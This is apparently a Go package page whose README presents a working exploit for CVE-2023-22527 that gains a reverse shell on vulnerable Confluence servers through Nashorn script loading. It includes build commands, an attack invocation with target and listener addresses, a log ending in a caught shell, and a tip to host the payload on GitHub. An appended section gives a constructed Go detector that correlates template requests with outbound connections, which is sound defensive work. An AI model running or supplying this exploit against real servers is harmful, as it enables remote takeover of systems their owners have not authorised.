nashorn

command module
v0.0.0-...-1b4b94d Latest
Warning

This package is not in the latest version of its module.
Published: Apr 17, 2024 License: Apache-2.0 Imports: 15 Imported by: 0

README

In Memory Confluence Nashorn Reverse Shell

This exploit establishes the go-exploit Nashorn reverse shell on a Confluence target, provided Confluence is running on a Java version below 15 (the Nashorn engine was removed from the JDK in Java 15). It uses the Nashorn 'load' keyword to fetch the go-exploit Nashorn script via HTTP, which bypasses the OGNL expression size limit. In a real-world attack, this script could be stored on GitHub or similar hosting to avoid having to host the payload yourself.

Compiling

To build a docker image:

make docker

If you have a Go build environment handy, you can also just use make:

albinolobster@mournland:~/cve-2023-22527/reverseshell$ make
gofmt -d -w cve-2023-22527.go 
golangci-lint run --fix cve-2023-22527.go
GOOS=linux GOARCH=arm64 go build -o build/cve-2023-22527_linux-arm64 cve-2023-22527.go

Usage Example (Encrypted Reverse Shell)

albinolobster@mournland:~/cve-2023-22527/nashorn$ sudo docker run -it --network=host nashorn -a -v -c -e -rhost 10.9.49.88 -rport 8090 -lhost 10.9.49.75 -lport 1270 -httpAddr 10.9.49.75
time=2024-03-05T16:54:28.674Z level=STATUS msg="Certificate not provided. Generating a TLS Certificate"
time=2024-03-05T16:54:28.746Z level=STATUS msg="Starting TLS listener on 10.9.49.75:1270"
time=2024-03-05T16:54:28.746Z level=STATUS msg="Starting target" index=0 host=10.9.49.88 port=8090 ssl=false "ssl auto"=true
time=2024-03-05T16:54:28.893Z level=STATUS msg="Validating Confluence target" host=10.9.49.88 port=8090
time=2024-03-05T16:54:29.095Z level=SUCCESS msg="Target verification succeeded!" host=10.9.49.88 port=8090 verified=true
time=2024-03-05T16:54:29.095Z level=STATUS msg="Running a version check on the remote target" host=10.9.49.88 port=8090
time=2024-03-05T16:54:29.213Z level=VERSION msg="The self-reported version is: 8.5.3" host=10.9.49.88 port=8090 version=8.5.3
time=2024-03-05T16:54:29.213Z level=SUCCESS msg="The target appears to be a vulnerable version!" host=10.9.49.88 port=8090 vulnerable=yes
time=2024-03-05T16:54:29.213Z level=STATUS msg="HTTP server listening for 10.9.49.75:8080/OjvuCSACUpwc"
time=2024-03-05T16:54:31.214Z level=STATUS msg="Sending exploit to http://10.9.49.88:8090/template/aui/text-inline.vm"
time=2024-03-05T16:54:31.969Z level=STATUS msg="Sending payload"
time=2024-03-05T16:54:33.429Z level=SUCCESS msg="Caught new shell from 10.9.49.88:38856"
time=2024-03-05T16:54:33.429Z level=STATUS msg="Active shell from 10.9.49.88:38856"
id
uid=2002(confluence) gid=2002(confluence) groups=2002(confluence),0(root)
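
Seen from the server side, the run log above is a request to /template/aui/text-inline.vm followed within seconds by outbound connections from the Confluence host (the script fetch, then the shell). The Go program below is an added detection example, not part of this project's code: it correlates the two events. The log formats, the sample lines and the Correlate function are constructed assumptions.

```go
package main

import (
	"fmt"
	"strings"
	"time"
)

// Constructed sample logs in assumed formats (adapt the parsing to your own):
// access: "<RFC3339 time> <client> <method> <path>"; egress: "<RFC3339 time> <src> <dst:port>"
var accessLog = []string{
	"2024-03-05T16:54:31Z 10.9.49.75 POST /template/aui/text-inline.vm",
	"2024-03-05T17:10:02Z 10.9.49.20 GET /template/aui/text-inline.vm",
}
var egressLog = []string{
	"2024-03-05T16:54:32Z 10.9.49.88 10.9.49.75:8080",
	"2024-03-05T16:54:33Z 10.9.49.88 10.9.49.75:1270",
	"2024-03-05T18:00:00Z 10.9.49.88 10.9.49.10:5432",
}

const templatePath = "/template/aui/text-inline.vm" // endpoint named in the run log

// Correlate returns one alert for each outbound connection that server opened
// within window after a request to templatePath reached it.
func Correlate(access, egress []string, server string, window time.Duration) []string {
	var alerts []string
	for _, a := range access {
		af := strings.Fields(a)
		if len(af) != 4 || strings.SplitN(af[3], "?", 2)[0] != templatePath {
			continue
		}
		at, err := time.Parse(time.RFC3339, af[0])
		if err != nil {
			continue // skip lines with an unparseable timestamp
		}
		for _, e := range egress {
			if ef := strings.Fields(e); len(ef) == 3 && ef[1] == server {
				et, err := time.Parse(time.RFC3339, ef[0])
				if d := et.Sub(at); err == nil && d >= 0 && d <= window {
					alerts = append(alerts, fmt.Sprintf("%s requested %s; egress to %s %s later", af[1], templatePath, ef[2], d))
				}
			}
		}
	}
	return alerts
}

func main() {
	fmt.Println(strings.Join(Correlate(accessLog, egressLog, "10.9.49.88", 10*time.Second), "\n"))
}
```

The correlation keys on timing rather than on the requester's address because, as the README notes, the script can be hosted somewhere other than the requesting host.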
